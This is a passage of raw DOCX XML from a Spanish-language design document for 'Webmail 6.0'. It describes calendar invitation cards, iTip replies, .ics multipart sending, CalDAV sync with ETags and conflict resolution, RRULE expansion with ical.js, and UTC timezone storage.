      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[227]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La tarjeta de invitación muestra: título del evento con icono de calendario, fecha y hora formateadas en el timezone local del usuario (ej:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Jueves 15 de mayo, 14:00 – 15:00 GMT-3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), ubicación con enlace a Google Maps si es una dirección física, organizador con avatar y nombre, lista de asistentes con sus estados de respuesta, y tres botones de acción primarios:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Aceptar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(verde),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Quizás</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(amarillo), y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Declinar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(rojo).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Al presionar cualquiera de los botones, el sistema ejecuta el flujo iTip (RFC 5546): genera un iCalendar de respuesta con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">METHOD:REPLY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, establece el</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PARTSTAT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">del asistente (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ACCEPTED</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">TENTATIVE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">DECLINED</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), y envía la respuesta al organizador vía SMTP. Simultáneamente, el evento se añade/actualiza en el calendario CalDAV del usuario con el estado correspondiente. Si el usuario no tiene un calendario CalDAV configurado, el evento se almacena en un calendario local (MongoDB) con sincronización diferida cuando se configure CalDAV.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Para actualizaciones de eventos existentes (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">METHOD:REQUEST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con secuencia mayor), la tarjeta muestra un badge</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Actualizado</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y resalta los cambios mediante diff visual: campos modificados aparecen con fondo amarillo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">#FFF8E1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y un indicador de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cambio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">junto al valor anterior tachado. El usuario puede aceptar la actualización o mantener la versión previa.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Para cancelaciones (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">METHOD:CANCEL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), la tarjeta muestra un banner rojo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">#EA4335</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con texto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Este evento ha sido cancelado</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y un botón</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Eliminar del calendario</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">que remueve el evento vía CalDAV</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">DELETE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="125"/>
    <w:bookmarkStart w:id="126" w:name="Xa660726d9537e0f8cccdac29148eb8afdf728ec"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.2.3 Envío de Invitaciones: Composer + .ICS Multipart/Alternative</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El envío de invitaciones desde Webmail 6.0 se integra directamente en el composer de correo. Un botón</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Programar reunión</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">en la barra de herramientas del compositor abre un panel lateral con campos para: título del evento, fecha/hora de inicio y fin (pickers con selección de timezone del usuario), ubicación (con autocompletado de direcciones previas), y lista de asistentes (sincronizada con el módulo de contactos).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Al enviar, el sistema genera un email multipart con tres partes:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">text/plain</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con la descripción legible del evento,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">text/html</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con formato enriquecido generado desde el mismo Tiptap del composer, y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">text/calendar; method=REQUEST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con el iCalendar RFC 5545 completo. El componente iCalendar incluye</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">UID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">generado v4 UUID,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ORGANIZER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con el email de la cuenta activa,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ATTENDEE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para cada destinatario con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ROLE=REQ-PARTICIPANT;RSVP=TRUE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">VALARM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">opcional si el usuario configuró recordatorio.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Los asistentes que usan Webmail 6.0 recibirán la tarjeta de preview con botones Aceptar/Declinar. Los que usan otros clientes (Outlook, Apple Mail, Thunderbird) recibirán la invitación estándar iCalendar que sus clientes procesarán nativamente.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="126"/>
    <w:bookmarkEnd w:id="127"/>
    <w:bookmarkStart w:id="131" w:name="sincronización"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.3 Sincronización</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="128" w:name="Xbfeb6e7e07c91c554e75fe2c5f2538a2c5daab0"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.3.1 Sincronización Bidireccional: ETags + Sync-Tokens + Conflict Resolution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La sincronización bidireccional entre Webmail 6.0 y el servidor CalDAV implementa las mejores prácticas del protocolo: resolución a nivel de campo (no de ítem completo), uso de ETags para detección de cambios, sync-tokens para sincronización incremental, y establecimiento de dirección de sync por campo para minimizar conflictos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[226]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El flujo de sincronización opera así: en cada ciclo de sync (disparado por cron cada 5 minutos o manualmente por el usuario), el backend obtiene el sync-token almacenado para el calendario y ejecuta un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sync-collection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">REPORT con el token. El servidor responde con: (a) recursos modificados desde el último sync, (b) recursos eliminados, y (c) un nuevo sync-token. Para cada recurso modificado, Webmail 6.0 compara el ETag local con el remoto; si difieren, descarga el iCalendar actualizado y mergea con la versión local.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El sistema de resolución de conflictos sigue estas reglas en orden de prioridad: si el cambio es local no sincronizado aún, gana el local (dirección de sync por defecto: server → client para cambios del servidor, client → server para cambios locales). En caso de cambio simultáneo en ambos lados (doble modificación entre sincronizaciones), se aplica resolución a nivel de campo:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SUMMARY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">DESCRIPTION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">LOCATION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">se mergean tomando el valor más reciente por timestamp;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">DTSTART</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">DTEND</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RRULE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">se resuelven con estrategia</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">último escritor gana</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ATTENDEES</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">se mergean la lista. Los conflictos no auto-resolvibles se notifican al usuario mediante un toast con opción de revisar manualmente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Los eventos creados localmente se envían al servidor CalDAV vía</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PUT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con header</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">If-None-Match: *</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para prevenir sobrescritura. Los eventos eliminados localmente se eliminan en el servidor vía</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">DELETE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con el ETag correspondiente. Toda operación CalDAV se registra en un log de sync (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CalendarSyncLog</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) con timestamp, dirección, operación, resultado, y ETag involucrado, facilitando debugging y auditoría.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="128"/>
    <w:bookmarkStart w:id="129" w:name="rrule-con-ical.js"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.3.2 RRULE con ical.js</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El manejo de eventos recurrentes es una de las fuentes principales de complejidad en calendarios. Webmail 6.0 utiliza ical.js para parsear las reglas</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RRULE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(RFC 5545) y expandirlas a instancias individuales</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[158]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Las reglas soportadas incluyen: frecuencia (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">FREQ=DAILY/WEEKLY/MONTHLY/YEARLY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), intervalo (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">INTERVAL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), recuento máximo (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">COUNT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), fecha de fin (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">UNTIL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), días de la semana (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BYDAY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), día del mes (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BYMONTHDAY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), mes (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BYMONTH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), y posición (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BYSETPOS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La expansión de RRULE se ejecuta como un job en BullMQ cada noche (02:00 AM timezone del servidor), generando instancias concretas para los próximos 90 días. Este enfoque de pre-computación permite que FullCalendar cargue eventos rápidamente sin calcular recurrencias en tiempo real. Para eventos con excepciones (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">EXDATE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), las instancias correspondientes se marcan como excluidas. Para modificaciones de instancias individuales (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RECURRENCE-ID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), se genera un evento override que reemplaza la instancia base en consultas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cuando un usuario modifica una instancia recurrente, el sistema presenta el diálogo:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">¿Aplicar cambios solo a este evento o a toda la serie?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Si selecciona</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">solo este evento</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, se crea un componente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">VEVENT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RECURRENCE-ID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">apuntando a la instancia original. Si selecciona</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">toda la serie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, se modifica la regla</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RRULE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">base. Esta distinción se preserva en el iCalendar sincronizado vía CalDAV.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="129"/>
    <w:bookmarkStart w:id="130" w:name="timezones-iana-almacenamiento-en-utc"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.3.3 Timezones: IANA, Almacenamiento en UTC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El manejo de zonas horarias es uno de los mayores desafíos en calendarios:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">VTIMEZONE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">en ICS es notoriamente problemático entre clientes, especialmente Outlook</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[155]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[156]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Webmail 6.0 adopta la estrategia de almacenamiento en UTC con conversión a la zona horaria local del usuario para visualización.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Todos los eventos se almacenan internamente con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">DTSTART</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">DTEND</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
